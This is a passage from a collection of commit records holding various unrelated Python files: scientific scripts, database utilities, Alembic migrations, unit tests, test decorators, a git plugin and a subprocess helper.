(8.515214535096632, 47.175496635565885), (8.513139577193424, 47.175600066313542),
(8.513465734818856, 47.178027239429234)]
class TestInputSetupWorkflowCase(unittest.TestCase):
def setUp(self):
self.config = cea.config.Configuration(cea.config.DEFAULT_CONFIG)
self.config.project = os.path.expandvars("${TEMP}/reference-case-open")
def test_input_setup_workflow(self):
self.config.create_polygon.coordinates = POLYGON_COORDINATES
self.config.create_polygon.filename = 'site'
data_initializer.main(self.config)
create_polygon.main(self.config)
# TODO: Mock osmnx.create_footprints_download
zone_helper.main(self.config)
surroundings_helper.main(self.config)
terrain_helper.main(self.config)
streets_helper.main(self.config)
archetypes_mapper.main(self.config)
if __name__ == '__main__':
unittest.main()
| Python | 0 | |
8465d9a9b2c30b0b493bdf9ba24a29e39a51c1df | add dbutil to compute archive_begin for HADS sites | scripts/dbutil/compute_hads_sts.py | scripts/dbutil/compute_hads_sts.py | """Compute the archive start time of a HADS/DCP network"""
from pyiem.network import Table as NetworkTable
import sys
import psycopg2
import datetime
THISYEAR = datetime.datetime.now().year
HADSDB = psycopg2.connect(database='hads', host='iemdb')
MESOSITEDB = psycopg2.connect(database='mesosite', host='iemdb')
def do(network, sid):
cursor = HADSDB.cursor()
running = None
# We work backwards
for yr in range(THISYEAR, 2001, -1):
cursor.execute("""
SELECT min(valid) from raw""" + str(yr) + """
WHERE station = %s
""", (sid,))
minv = cursor.fetchone()[0]
if minv is None:
return running
running = minv
return running
def main(argv):
"""Go main Go"""
network = argv[1]
nt = NetworkTable(network)
for sid in nt.sts.keys():
sts = do(network, sid)
if sts is None:
continue
if (nt.sts[sid]['archive_begin'] is None or
nt.sts[sid]['archive_begin'] != sts):
osts = nt.sts[sid]['archive_begin']
f = "%Y-%m-%d %H:%M"
print(("%s [%s] new sts: %s OLD sts: %s"
) % (sid, network, sts.strftime(f),
osts.strftime(f) if osts is not None else 'null'))
cursor = MESOSITEDB.cursor()
cursor.execute("""UPDATE stations SET archive_begin = %s
WHERE id = %s and network = %s""", (sts, sid, network))
cursor.close()
MESOSITEDB.commit()
if __name__ == '__main__':
main(sys.argv)
| Python | 0 | |
582b5c598da5b35032447f0eb7888051b84f844c | Add datetime to fast cache | alembic/versions/20860ffde766_add_datetime_to_fastcache.py | alembic/versions/20860ffde766_add_datetime_to_fastcache.py | """Add datetime to fastcache
Revision ID: 20860ffde766
Revises: 471e6f7722a7
Create Date: 2015-04-14 07:44:36.507406
"""
# revision identifiers, used by Alembic.
revision = '20860ffde766'
down_revision = '471e6f7722a7'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('TranslationFastCaches', sa.Column('datetime', sa.DateTime(), nullable=True))
op.create_index(u'ix_TranslationFastCaches_datetime', 'TranslationFastCaches', ['datetime'], unique=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_index(u'ix_TranslationFastCaches_datetime', table_name='TranslationFastCaches')
op.drop_column('TranslationFastCaches', 'datetime')
### end Alembic commands ###
| Python | 0.000001 | |
f54f427c16b394ff1ea0f55875bfb9d02e7264b0 | add SiD calculator. | src/get_SiD.py | src/get_SiD.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
# Introduction: This script is used to calculate similarity index (SiD)
# Created by Xiangchen Li on 2017/3/19 21:15
from collections import defaultdict
from src.global_items import genetic_code
def get_sid(virus_rscu_file, host_rscu_file):
for pass_codon in ["TAG", "TAA", "TGA", "ATG", "TGG"]:
del genetic_code[pass_codon]
virus_rscu_dict = defaultdict()
with open(virus_rscu_file, 'r') as f1:
for each_line in f1.readlines()[1:]:
v_list = each_line.strip().split('\t')
v_codon = v_list[0]
v_rscu = v_list[1]
virus_rscu_dict[v_codon] = float(v_rscu)
host_rscu_dict = defaultdict()
with open(host_rscu_file, 'r') as f2:
for each_line in f2.readlines()[1:]:
h_list = each_line.strip().split('\t')
h_codon = h_list[0]
h_rscu = h_list[1]
host_rscu_dict[h_codon] = float(h_rscu)
aa = 0
bb = 0
cc = 0
for codon in genetic_code.keys():
aa += virus_rscu_dict[codon] * host_rscu_dict[codon]
bb += pow(virus_rscu_dict[codon], 2)
cc += pow(host_rscu_dict[codon], 2)
"""
R(A,B) is defined as the cosine value of the angle included
between the A and B spatial vectors, and represents the degree of
similarity between the virus and host overall codon usage patterns.
D(A,B) represents the potential effect of the overall codon usage
of the host on that of virus, and its value ranges from 0 to 1.0.
"""
rr = aa / pow(bb * cc, 0.5) # rr -> R(A,B)
dd = (1 - rr) / 2 # dd -> D(A,B)
return dd
| Python | 0 | |
cd9f80c1567c945fe40e02af56433c49c6ddad65 | Create lintcode_二进制求和.py | lintcode_二进制求和.py | lintcode_二进制求和.py | /**
* http://www.lintcode.com/zh-cn/problem/add-binary/
* 给定两个二进制字符串,返回他们的和(用二进制表示。
* 样例 a = 11 b = 1 返回 100
*/
class Solution:
# @param {string} a a number
# @param {string} b a number
# @return {string} the result
def addBinary(self, a, b):
# Write your code here
a = a[::-1]
b = b[::-1]
index = 0
result = []
flag = 0
while (index < len(a)) and (index < len(b)):
res = int(a[index]) + int(b[index]) + flag
result.append(str(res%2))
flag = res / 2
index = index + 1
while index < len(a):
res = int(a[index]) + flag
result.append(str(res%2))
flag = res / 2
index = index + 1
while index < len(b):
res = int(b[index]) + flag
result.append(str(res%2))
flag = res / 2
index = index + 1
if flag != 0:
result.append(str(flag))
return ''.join(result[::-1])
| Python | 0.000005 | |
65b362985d502440b12efc8a6a49ab0603354fd2 | Add script to count emotional sentences according to LIWC | liwc_emotional_sentences.py | liwc_emotional_sentences.py | """Count the numbers of annotated entities and emotional sentences in the
corpus that was manually annotated.
Usage: python annotation_statistics.py <dir containing the folia files with
EmbodiedEmotions annotations>
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import os
from collections import Counter
import json
import codecs
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('dir_name', help='the name of the dir containing the '
'FoLiA XML files that should be processed.')
args = parser.parse_args()
dir_name = args.dir_name
act_tag = '{http://ilk.uvt.nl/folia}div'
cur_dir = os.getcwd()
os.chdir(dir_name)
folia_counter = 0
num_sent = 0
num_emotional = 0
stats = Counter()
entity_words = {}
text_stats = {}
emotional_cats = ['liwc-Posemo', 'liwc-Negemo']
print 'Files'
for file_name in os.listdir(dir_name):
folia_counter += 1
print '{}'.format(file_name)
text_id = file_name[0:13]
text_stats[text_id] = Counter()
sents = set()
# load document
context = etree.iterparse(file_name,
events=('start', 'end'),
tag=act_tag,
huge_tree=True)
for event, elem in context:
if event == 'end' and elem.get('class') == 'act':
# load act into memory
act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
sentences = act_xml.find_all(sentence)
s = None
for sent in sentences:
if not note(sent.parent):
# some t elements appear to be empty (this is not
# allowed, but it happens). So, check whether there is
# a string to add before adding it.
if sent.t:
if sent.t.string:
s = sent.t.string
# calculate stats only for unique sentences in text
if s and s not in sents:
sents.add(s)
num_sent += 1
entities = sent.find_all('entity')
emotional = False
for entity in entities:
e = entity.attrs.get('class')
if e in emotional_cats:
emotional = True
if emotional:
num_emotional += 1
del context
# clear memory
# results in segmentation fault (for some reason)
#if delete:
# elem.clear()
# while elem.getprevious() is not None:
# del elem.getparent()[0]
# del context
# print stats
print '\nBasic stats'
print '{} sentences in {} files'.format(num_sent, folia_counter)
perc = float(num_emotional)/float(num_sent)*100.0
print '{} emotional sentences ({:.2f}%)'.format(num_emotional, perc)
| Python | 0 | |
c910e1898c1e49c60877e092032daebd289c6f31 | add scripts to export from env file to profile | scripts/env2profile.py | scripts/env2profile.py | #!/usr/bin/evn python
import os
import re
import sys
line_re = re.compile('(\S+?)\s*?=\s*?(\S+?)$')
def env2profile(env_path, out_path):
out_lines = list()
with open(env_path, 'r') as env_file:
for line in env_file.readlines():
matched = line_re.findall(line)
if matched and len(matched[0]) == 2:
name, value = matched[0]
out_lines.append('export %s=%s' % (name, value))
with open(out_path, 'w') as out_file:
out_file.write('\n'.join(out_lines))
if __name__ == '__main__':
if len(sys.argv) == 3:
_, env_path, out_path = sys.argv
env2profile(env_path, out_path)
else:
print 'Wrong numbers of args'
| Python | 0 | |
8351d98c3036021507a75b65e424d02942f09633 | Add alembic upgrade info | alembic/versions/3d3c72ecbc0d_add_rtp_task_resource_record_table.py | alembic/versions/3d3c72ecbc0d_add_rtp_task_resource_record_table.py | """Add rtp_task_resource_record table
Revision ID: 3d3c72ecbc0d
Revises: c9a1ff35c6ed
Create Date: 2018-01-20 21:35:16.716477+00:00
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '3d3c72ecbc0d'
down_revision = 'c9a1ff35c6ed'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('rtp_task_resource_record',
sa.Column('obsid', sa.BigInteger(), nullable=False),
sa.Column('task_name', sa.Text(), nullable=False),
sa.Column('start_time', sa.BigInteger(), nullable=False),
sa.Column('stop_time', sa.BigInteger(), nullable=False),
sa.Column('max_memory', sa.Float(), nullable=True),
sa.Column('avg_cpu_load', sa.Float(), nullable=True),
sa.ForeignKeyConstraint(['obsid'], ['hera_obs.obsid'], ),
sa.PrimaryKeyConstraint('obsid', 'task_name')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('rtp_task_resource_record')
# ### end Alembic commands ###
| Python | 0 | |
843e6f0ccb73a387e151d7f40ef7a2b4fc1597e0 | test getmap | pathmap/test/test_getmap.py | pathmap/test/test_getmap.py | import unittest
from .. getmap import MapDownloader
class TestGetmap(unittest.TestCase):
pass
if __name__ == '__main__':
unittest.main()
| Python | 0.000001 | |
cc89c5222ec7f6d6f95b5efdce3958b3ca33814e | Add basic functionality and regression tests for ACA dark cal module | mica/archive/tests/test_aca_dark_cal.py | mica/archive/tests/test_aca_dark_cal.py | """
Basic functionality and regression tests for ACA dark cal module.
"""
import numpy as np
from ..aca_dark import dark_cal
def test_date_to_dark_id():
assert dark_cal.date_to_dark_id('2011-01-15T12:00:00') == '2011015'
def test_dark_id_to_date():
assert dark_cal.dark_id_to_date('2011015') == '2011:015'
def test_dark_temp_scale():
scale = dark_cal.dark_temp_scale(-10., -14)
assert np.allclose(scale, 0.70)
def test_get_dark_cal_id():
assert dark_cal.get_dark_cal_id('2007:008', 'nearest') == '2007006'
assert dark_cal.get_dark_cal_id('2007:008', 'before') == '2007006'
assert dark_cal.get_dark_cal_id('2007:008', 'after') == '2007069'
def test_get_dark_cal_image():
image = dark_cal.get_dark_cal_image('2007:008')
assert image.shape == (1024, 1024)
def test_get_dark_cal_props():
props = dark_cal.get_dark_cal_props('2007:008')
assert len(props['replicas']) == 5
assert props['start'] == '2007:006:01:56:46.817'
props = dark_cal.get_dark_cal_props('2007:008', include_image=True)
assert len(props['replicas']) == 5
assert props['start'] == '2007:006:01:56:46.817'
assert props['image'].shape == (1024, 1024)
def test_get_dark_cal_props_table():
props = dark_cal.get_dark_cal_props_table('2007:001', '2008:001')
assert np.allclose(props['eb'], [24.6, 25.89, 51.13, 1.9])
| Python | 0 | |
dd3ed1c8fdf9024a7978a1443baf8ca101f21642 | add demo object for channel | server/Mars/MarsRpc/ChannelObjs.py | server/Mars/MarsRpc/ChannelObjs.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2016 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from MarsLog.LogManager import LogManager
from Utils.Const import *
class EchoChannelObj(object):
def __init__(self, connector):
super(EchoChannelObj, self).__init__()
self.logger = LogManager.getLogger('MarsRpc.EchoChannelObj')
self.connector = connector
def onDisconnected(self):
self.logger.info('connector closed')
def onRead(self, data):
self.logger.info('received data: %s', data)
self.connector.writeData(data)
return MARS_RC_SUCCESSED
class LoggingChannelObj(object):
def __init__(self, connector):
super(LoggingChannelObj, self).__init__()
self.loggero = LogManager.getLogger('MarsRpc.LoggingChannelObj')
self.connector = connector
def onDisconnected(self):
self.logger.info('connector closed')
def onRead(self, data):
self.logger.info('received data: %s', data)
return MARS_RC_SUCCESSED
| Python | 0.000001 | |
160a3012db5513b4d3a45098a9b0b72e1f117b20 | add a constant coefficient test for sanity | lowmach/mg_constant_test.py | lowmach/mg_constant_test.py | #!/usr/bin/env python
"""
Test the variable coefficient MG solver with a CONSTANT coefficient
problem -- the same on from the multigrid class test. This ensures
we didn't screw up the base functionality here.
We solve:
u_xx + u_yy = -2[(1-6x**2)y**2(1-y**2) + (1-6y**2)x**2(1-x**2)]
u = 0 on the boundary
this is the example from page 64 of the book `A Multigrid Tutorial, 2nd Ed.'
The analytic solution is u(x,y) = (x**2 - x**4)(y**4 - y**2)
"""
from __future__ import print_function
import sys
import numpy
import mesh.patch as patch
import variable_coeff_MG as MG
import pylab
# the analytic solution
def true(x,y):
return (x**2 - x**4)*(y**4 - y**2)
# the coefficients
def alpha(x,y):
return numpy.ones_like(x)
# the L2 error norm
def error(myg, r):
# L2 norm of elements in r, multiplied by dx to
# normalize
return numpy.sqrt(myg.dx*myg.dy*numpy.sum((r[myg.ilo:myg.ihi+1,
myg.jlo:myg.jhi+1]**2).flat))
# the righthand side
def f(x,y):
return -2.0*((1.0-6.0*x**2)*y**2*(1.0-y**2) + (1.0-6.0*y**2)*x**2*(1.0-x**2))
# test the multigrid solver
nx = 256
ny = nx
# create the coefficient variable -- note we don't want Dirichlet here,
# because that will try to make alpha = 0 on the interface. alpha can
# have different BCs than phi
g = patch.Grid2d(nx, ny, ng=1)
d = patch.CellCenterData2d(g)
bc_c = patch.BCObject(xlb="neumann", xrb="neumann",
ylb="neumann", yrb="neumann")
d.register_var("c", bc_c)
d.create()
c = d.get_var("c")
c[:,:] = alpha(g.x2d, g.y2d)
pylab.clf()
pylab.figure(num=1, figsize=(5.0,5.0), dpi=100, facecolor='w')
pylab.imshow(numpy.transpose(c[g.ilo:g.ihi+1,g.jlo:g.jhi+1]),
interpolation="nearest", origin="lower",
extent=[g.xmin, g.xmax, g.ymin, g.ymax])
pylab.xlabel("x")
pylab.ylabel("y")
pylab.title("nx = {}".format(nx))
pylab.colorbar()
pylab.savefig("mg_alpha.png")
# check whether the RHS sums to zero (necessary for periodic data)
rhs = f(g.x2d, g.y2d)
print("rhs sum: {}".format(numpy.sum(rhs[g.ilo:g.ihi+1,g.jlo:g.jhi+1])))
# create the multigrid object
a = MG.VarCoeffCCMG2d(nx, ny,
xl_BC_type="dirichlet", yl_BC_type="dirichlet",
xr_BC_type="dirichlet", yr_BC_type="dirichlet",
nsmooth=10,
nsmooth_bottom=50,
coeffs=c, coeffs_bc=bc_c,
verbose=1)
# debugging
# for i in range(a.nlevels):
# print(i)
# print(a.grids[i].get_var("coeffs"))
# initialize the solution to 0
a.init_zeros()
# initialize the RHS using the function f
rhs = f(a.x2d, a.y2d)
a.init_RHS(rhs)
# solve to a relative tolerance of 1.e-11
a.solve(rtol=1.e-11)
#a.smooth(a.nlevels-1, 50000)
# alternately, we can just use smoothing by uncommenting the following
#a.smooth(a.nlevels-1,50000)
# get the solution
v = a.get_solution()
# compute the error from the analytic solution
b = true(a.x2d,a.y2d)
e = v - b
print(" L2 error from true solution = %g\n rel. err from previous cycle = %g\n num. cycles = %d" % \
(error(a.soln_grid, e), a.relative_error, a.num_cycles))
# plot it
pylab.clf()
pylab.figure(num=1, figsize=(10.0,5.0), dpi=100, facecolor='w')
pylab.subplot(121)
pylab.imshow(numpy.transpose(v[a.ilo:a.ihi+1,a.jlo:a.jhi+1]),
interpolation="nearest", origin="lower",
extent=[a.xmin, a.xmax, a.ymin, a.ymax])
pylab.xlabel("x")
pylab.ylabel("y")
pylab.title("nx = {}".format(nx))
pylab.colorbar()
pylab.subplot(122)
pylab.imshow(numpy.transpose(e[a.ilo:a.ihi+1,a.jlo:a.jhi+1]),
interpolation="nearest", origin="lower",
extent=[a.xmin, a.xmax, a.ymin, a.ymax])
pylab.xlabel("x")
pylab.ylabel("y")
pylab.title("error")
pylab.colorbar()
pylab.tight_layout()
pylab.savefig("mg_test.png")
# store the output for later comparison
my_data = a.get_solution_object()
my_data.write("mg_test")
| Python | 0.000049 | |
81b9d141295ee2a8b31974aa86d89b80dfefe3ca | Create question5.py | chengjun/question5.py | chengjun/question5.py | #!usr/bin/python
import re
class extrac_url():
def __init__(self,url):
self.url = url
def pater(self):
url = self.url
[scheme1,url_rest] = url.split('//')
scheme = re.search(r'(.+)//',url).group(1)
#print "scheme is %s " % scheme
netloc = re.search(r'//(.+)/',url).group(1)
#print "netloc is %s " % netloc
path = re.search(r'(/.+)\?',url_rest).group(1)
#print 'path is %s'%path
#tt =re.compile(r'\?.+')
query_param = re.search(r'\?(.+)#',url).group(1)
query_params={}
for item in re.split(r'&', query_param):
#print item
index = item.find('=')
query_params[item[:index]] = item[index+1:]
#print "query_params is %s " %query_params
fragment = re.search(r'#(.+)',url).group(1)
#print "fragment is %s " %self.fragment
return [scheme,netloc,path,query_params,fragment]
if __name__=="__main__":
ttt = extrac_url("http://mp.weixin.qq.com/s?__biz=MzA4MjEyNTA5Mw==&mid=2652566513#wechat_redirect").pater()
print "scheme is %s " % ttt[0]
print "netloc is %s " % ttt[1]
print 'path is %s'%ttt[2]
print 'query_params is %s'%ttt[3]
print 'fragment is %s'%ttt[4]
#rint ttt
| Python | 0.99937 | |
5eefc407b8f51c017a3f4193c88f6dc188a88601 | Include OpenCV based Python CLAHE script | src/CLAHE_dir.py | src/CLAHE_dir.py | from PIL import Image
import numpy as np
import h5py
import os
import sys
import cv2
# Maybe consider implemeting more involved auto-balancing
# http://wiki.cmci.info/documents/120206pyip_cooking/python_imagej_cookbook#automatic_brightnesscontrast_button
def apply_clahe_to_H5(fn, clahe):
f = h5py.File(fn, "r+")
img = f["/img"]
# apply clahe
arr = clahe.apply(np.array(img))
# stretch distribution across 0-255 range
max_a = np.max(arr)
min_a = np.min(arr)
alpha = 255.0/(max_a - min_a)
beta = -alpha*min_a
arr = (alpha*arr + beta).astype(np.uint8)
# resave image
img[...] = arr
f.close()
def get_H5_array(fn):
f = h5py.File(fn, "r")
return np.array(f["/img"])
def main():
"""Make TIF images of all H5 matrices in directory
"""
dir = os.getcwd()
# file = sys.argv[1]
files = os.listdir(dir)
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(63,63))
for file in files:
if file.endswith("1,1_prealigned.h5"):
print "Applying CLAHE to " + file
# if file == 'Tile_r1-c7_S2-W001_sec15.h5':
fn = os.path.join(dir, file)
apply_clahe_to_H5(fn, clahe)
# if __name__ == '__main__':
# main() | Python | 0 | |
5fbd3d187c0a1c164c34320ad504030206429c19 | Use --first-parent when collecting commits. | asv/plugins/git.py | asv/plugins/git.py | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Supports git repositories for the benchmarked project.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import re
from ..console import log
from ..repo import Repo
from .. import util
class Git(Repo):
def __init__(self, url, path):
self._git = util.which("git")
self._path = os.path.abspath(path)
if not os.path.exists(self._path):
log.info("Cloning project")
self._run_git(['clone', url, self._path], chdir=False)
log.info("Fetching recent changes")
self.pull()
@property
def path(self):
return self._path
@classmethod
def url_match(cls, url):
regexes = [
'^https?://.*?\.git$',
'^git@.*?\.git$']
for regex in regexes:
if re.match(regex, url):
return True
return False
def _run_git(self, args, chdir=True, **kwargs):
if chdir:
orig_dir = os.getcwd()
os.chdir(self._path)
try:
return util.check_output(
[self._git] + args, **kwargs)
finally:
if chdir:
os.chdir(orig_dir)
def pull(self):
self._run_git(['fetch', 'origin'])
self.checkout('master')
self._run_git(['pull'])
def checkout(self, branch='master'):
self._run_git(['checkout', branch])
self.clean()
def clean(self):
self._run_git(['clean', '-fxd'])
def get_date(self, hash):
# TODO: This works on Linux, but should be extended for other platforms
return int(self._run_git(
['show', hash, '--quiet', '--format=format:%ct'],
dots=False).strip().split()[0]) * 1000
def get_hashes_from_range(self, range_spec):
if range_spec == 'master':
range_spec = 'master^!'
return self._run_git(
['log', '--quiet', '--first-parent', '--format=format:%H',
range_spec], dots=False
).strip().split()
def get_hash_from_tag(self, tag):
return self._run_git(
['show', tag, '--quiet', '--format=format:%H'],
dots=False).strip().split()[0]
def get_tags(self):
return self._run_git(
['tag', '-l']).strip().split()
def get_date_from_tag(self, tag):
return self.get_date(tag + "^{commit}")
| # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Supports git repositories for the benchmarked project.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import re
from ..console import log
from ..repo import Repo
from .. import util
class Git(Repo):
def __init__(self, url, path):
self._git = util.which("git")
self._path = os.path.abspath(path)
if not os.path.exists(self._path):
log.info("Cloning project")
self._run_git(['clone', url, self._path], chdir=False)
log.info("Fetching recent changes")
self.pull()
@property
def path(self):
return self._path
@classmethod
def url_match(cls, url):
regexes = [
'^https?://.*?\.git$',
'^git@.*?\.git$']
for regex in regexes:
if re.match(regex, url):
return True
return False
def _run_git(self, args, chdir=True, **kwargs):
if chdir:
orig_dir = os.getcwd()
os.chdir(self._path)
try:
return util.check_output(
[self._git] + args, **kwargs)
finally:
if chdir:
os.chdir(orig_dir)
def pull(self):
self._run_git(['fetch', 'origin'])
self.checkout('master')
self._run_git(['pull'])
def checkout(self, branch='master'):
self._run_git(['checkout', branch])
self.clean()
def clean(self):
self._run_git(['clean', '-fxd'])
def get_date(self, hash):
# TODO: This works on Linux, but should be extended for other platforms
return int(self._run_git(
['show', hash, '--quiet', '--format=format:%ct'],
dots=False).strip().split()[0]) * 1000
def get_hashes_from_range(self, range_spec):
if range_spec == 'master':
range_spec = 'master^!'
return self._run_git(
['log', '--quiet', '--format=format:%H', range_spec], dots=False
).strip().split()
def get_hash_from_tag(self, tag):
return self._run_git(
['show', tag, '--quiet', '--format=format:%H'],
dots=False).strip().split()[0]
def get_tags(self):
return self._run_git(
['tag', '-l']).strip().split()
def get_date_from_tag(self, tag):
return self.get_date(tag + "^{commit}")
| Python | 0 |
d4d9d9ac478bdaf2385ecff0a43bfc8fe4bb11c7 | Add decorator for ignoring DeprecationWarnings | oscar/test/decorators.py | oscar/test/decorators.py | import warnings
from functools import wraps
import mock
def dataProvider(fn_data_provider):
"""
Data provider decorator, allows another callable to provide the data for
the test. This is a nice feature from PHPUnit which is very useful. Am
sticking with the JUnit style naming as unittest does this already.
Implementation based on:
http://melp.nl/2011/02/phpunit-style-dataprovider-in-python-unit-test/#more-525
"""
def test_decorator(test_method):
def execute_test_method_with_each_data_set(self):
for data in fn_data_provider():
if (len(data) == 2 and isinstance(data[0], tuple) and
isinstance(data[1], dict)):
# Both args and kwargs being provided
args, kwargs = data[:]
else:
args, kwargs = data, {}
try:
test_method(self, *args, **kwargs)
except AssertionError, e:
self.fail("%s (Provided data: %s, %s)" % (e, args, kwargs))
return execute_test_method_with_each_data_set
return test_decorator
# This will be in Oscar 0.6 - it should be functools though!
def compose(*functions):
"""
Compose functions
This is useful for combining decorators.
"""
def _composed(*args):
for fn in functions:
try:
args = fn(*args)
except TypeError:
# args must be scalar so we don't try to expand it
args = fn(args)
return args
return _composed
no_database = mock.patch(
'django.db.backends.util.CursorWrapper', mock.Mock(
side_effect=RuntimeError("Using the database is not permitted!")))
no_filesystem = mock.patch('__builtin__.open', mock.Mock(
side_effect=RuntimeError("Using the filesystem is not permitted!")))
no_sockets = mock.patch('socket.getaddrinfo', mock.Mock(
side_effect=RuntimeError("Using sockets is not permitted!")))
no_externals = no_diggity = compose(
no_database, no_filesystem, no_sockets) # = no doubt
def ignore_deprecation_warnings(target):
"""
Ignore deprecation warnings for the wrapped TestCase or test method
This is useful as the test runner can be set to raise an exception on a
deprecation warning. Using this decorator allows tests to exercise
deprecated code without an exception.
"""
if not target.__class__.__name__ == 'instancemethod':
# Decorate every test method in class
for attr in dir(target):
if not attr.startswith('test'):
continue
attr_value = getattr(target, attr)
if not hasattr(attr_value, '__call__'):
continue
setattr(target, attr, ignore_deprecation_warnings(attr_value))
return target
else:
# Decorate single test method
@wraps(target)
def _wrapped(*args, **kwargs):
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=DeprecationWarning)
return target(*args, **kwargs)
return _wrapped
| import mock
def dataProvider(fn_data_provider):
"""
Data provider decorator, allows another callable to provide the data for
the test. This is a nice feature from PHPUnit which is very useful. Am
sticking with the JUnit style naming as unittest does this already.
Implementation based on:
http://melp.nl/2011/02/phpunit-style-dataprovider-in-python-unit-test/#more-525
"""
def test_decorator(test_method):
def execute_test_method_with_each_data_set(self):
for data in fn_data_provider():
if (len(data) == 2 and isinstance(data[0], tuple) and
isinstance(data[1], dict)):
# Both args and kwargs being provided
args, kwargs = data[:]
else:
args, kwargs = data, {}
try:
test_method(self, *args, **kwargs)
except AssertionError, e:
self.fail("%s (Provided data: %s, %s)" % (e, args, kwargs))
return execute_test_method_with_each_data_set
return test_decorator
# This will be in Oscar 0.6 - it should be functools though!
def compose(*functions):
"""
Compose functions
This is useful for combining decorators.
"""
def _composed(*args):
for fn in functions:
try:
args = fn(*args)
except TypeError:
# args must be scalar so we don't try to expand it
args = fn(args)
return args
return _composed
no_database = mock.patch(
'django.db.backends.util.CursorWrapper', mock.Mock(
side_effect=RuntimeError("Using the database is not permitted!")))
no_filesystem = mock.patch('__builtin__.open', mock.Mock(
side_effect=RuntimeError("Using the filesystem is not permitted!")))
no_sockets = mock.patch('socket.getaddrinfo', mock.Mock(
side_effect=RuntimeError("Using sockets is not permitted!")))
no_externals = no_diggity = compose(
no_database, no_filesystem, no_sockets) # = no doubt
| Python | 0 |
f0af14b8fcd420b63a47e18938664e14cf9ea968 | Add generic asynchronous/synchronous run command | subiquity/utils.py | subiquity/utils.py | # Copyright 2015 Canonical, Ltd.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import errno
import subprocess
import os
import codecs
import pty
from tornado.process import Subprocess
from subiquity.async import Async
import shlex
import logging
log = logging.getLogger("subiquity.utils")
STREAM = Subprocess.STREAM
def run_command_async(cmd, streaming_callback=None):
return Async.pool.submit(run_command, cmd, streaming_callback)
def run_command(cmd, streaming_callback=None):
""" Executes `cmd` sending its output to `streaming_callback`
"""
if isinstance(cmd, str):
cmd = shlex.split(cmd)
log.debug("Running command: {}".format(cmd))
stdoutm, stdouts = pty.openpty()
proc = subprocess.Popen(cmd,
stdout=stdouts,
stderr=subprocess.PIPE)
os.close(stdouts)
decoder = codecs.getincrementaldecoder('utf-8')()
def last_ten_lines(s):
chunk = s[-1500:]
lines = chunk.splitlines(True)
return ''.join(lines[-10:]).replace('\r', '')
decoded_output = ""
try:
while proc.poll() is None:
try:
b = os.read(stdoutm, 512)
except OSError as e:
if e.errno != errno.EIO:
raise
break
else:
final = False
if not b:
final = True
decoded_chars = decoder.decode(b, final)
if decoded_chars is None:
continue
decoded_output += decoded_chars
if streaming_callback:
ls = last_ten_lines(decoded_output)
streaming_callback(ls)
if final:
break
finally:
os.close(stdoutm)
if proc.poll() is None:
proc.kill()
proc.wait()
errors = [l.decode('utf-8') for l in proc.stderr.readlines()]
if streaming_callback:
streaming_callback(last_ten_lines(decoded_output))
errors = ''.join(errors)
if proc.returncode == 0:
return decoded_output.strip()
else:
log.debug("Error with command: "
"[Output] '{}' [Error] '{}'".format(
decoded_output.strip(),
errors.strip()))
raise Exception("Problem running command: [Error] '{}'".format(
errors.strip()))
| Python | 0 | |
2aab90ab9e4a32bef1496149a2780b7385318043 | Add tests | symengine/tests/test_cse.py | symengine/tests/test_cse.py | from symengine import cse, sqrt, symbols
def test_cse_single():
x, y, x0 = symbols("x, y, x0")
e = pow(x + y, 2) + sqrt(x + y)
substs, reduced = cse([e])
assert substs == [(x0, x + y)]
assert reduced == [sqrt(x0) + x0**2]
def test_multiple_expressions():
w, x, y, z, x0 = symbols("w, x, y, z, x0")
e1 = (x + y)*z
